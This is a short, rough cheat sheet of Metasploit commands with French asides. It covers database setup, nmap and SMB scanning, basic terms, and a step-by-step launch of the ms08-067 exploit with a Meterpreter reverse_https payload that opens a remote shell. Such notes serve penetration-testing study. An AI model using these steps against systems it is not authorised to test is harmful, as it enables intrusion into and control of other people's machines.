Metasploit Framework (msf)

sudo msfconsole
MSF> db_connect <username>:<password>@<DATABASE>

check db, workspace creation

  • db_status
  • worspace  (répond default)
  • workspace -a customer1-dmz1

db_nmap -A -sT

db_nmap -sT --script smb-check-vulns.nse -p U:137,T:139

Read this article from


see /opt/backbox/msf/modules/auxiliary/scanner/smb

msf> use auxiliary/scanner/smb/smb_version
msf  auxiliary(smb_version)> show options
msf  auxiliary(smb_version)> set RHOSTS
msf  auxiliary(smb_version)> exploit
msf  auxiliary(smb_version)> back

cf Metasploit Unleashed website on Auxiliary Modules.

msf> db_import /home/user/report.nbe
msf> hosts -c address,name,os_flavor,svcs,vulns              -c indique col
msf> vulns -i
msf> search ms09_001  on ch dans msf un exploit

  • module: component of Metasploit Framework (e.g. scanner,payload)
  • vulnerability: security flaw in software that allows for unintended use
  • exploit: code that makes use of a vulnerability to execute arbitrary commands
  • stager: ‘magic tricks’ that allow your payload to execute successfully
  • payload: arbitrary commands  in shellcode (e.g. DoS or a remote shell)

Ex ms08-067 (de rank great):   
msf> use exploit/windows/smb/ms08-_067_netapi
msf  exploit(ms08-_067_netapi)>   show options
msf  exploit(ms08-_067_netapi)>   set RHOST
msf  exploit(ms08-_067_netapi)>   setg LHOST

show payloads or with TAB  set playload windows/meterpreter/reverse_https
msf  exploit(ms08-_067_netapi)> show advanced
msf  exploit(ms08-_067_netapi)> exploit

 Read more about the pass-the-hash technique.

Links on Meterpreter

From (2013):

Other web sites on msf

metasploit-unleashed online course